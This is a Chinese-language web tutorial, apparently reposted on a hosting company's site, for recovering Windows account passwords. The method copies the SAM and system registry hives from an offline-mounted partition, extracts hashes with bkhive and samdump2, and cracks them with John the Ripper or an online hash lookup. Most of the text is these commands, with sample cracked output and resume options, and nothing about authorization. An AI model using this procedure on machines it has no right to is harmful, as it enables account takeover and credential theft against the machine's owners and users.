用linux啟動(dòng)，并掛載Windows的系統(tǒng)分區(qū)把c：\windows\system32\config\目錄下的SAM和system復(fù)制出來(lái)
　　也可以用WINPE，DOS引導(dǎo)盤(pán)，都可以的，只要把SAM和system復(fù)制出來(lái)就行
　　開(kāi)始破解：
　　bkhive system keys ——生成keys文件
　　samdump2 SAM keys > hashes ——用SAM和keys生成hashes
　　john hashes ——跑hashes
　　友情提示：
　　可以直接訪問(wèn) http://www.objectif-securite.ch/en/products.php 在線查詢hash
　　現(xiàn)在沒(méi)有在linux下，改天上圖，下面我文字描述一下
　　mount -t ntfs /dev/hda1 /mnt/windows
　　mkdir /home/young001/sam
　　cp /mnt/windows/WINDOWS\system32\config/SAM /home/young001/sam
　　cp /mnt/windows/WINDOWS\system32\config/system /home/young001/sam
　　unount /mnt/windows
　　cd /home/young001/sam
　　bkhive system keys
　　samdump2 SAM keys > hashes
　　john hashes ——跑hashes
　　這樣密碼揪出來(lái)了
　　另外加上一些提示：
　　比如administrator密碼是123456，那么他會(huì)在最底下這么顯示
　　administrator：123456：500：e263f50a6a506be3d494d3d62b4dc666：：：看起來(lái)有點(diǎn)像/etc/passwd的內(nèi)容格式，如果當(dāng)時(shí)沒(méi)有看清楚密碼就清屏了，或者后來(lái)忘記已經(jīng)破解了的密碼，可以通過(guò)下面命令查看
　　john-1.7.2/run/john -show hashes有的時(shí)候密碼處有可能會(huì)顯示幾個(gè)問(wèn)號(hào)，如下
　　administrator：？？？456：500：e263f50a6a506be3d494d3d62b4dc666：：：這個(gè)時(shí)候可以通過(guò)
　　john-1.7.2/run/john -show hashes看看密碼是否完整。 如果還是不完整，那么可能密碼沒(méi)有完全破解完畢，可以加–restore 參數(shù)從原來(lái)基礎(chǔ)上繼續(xù)破解
　　john-1.7.2/run/john ——restore hashes

美國(guó)服務(wù)器租用

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。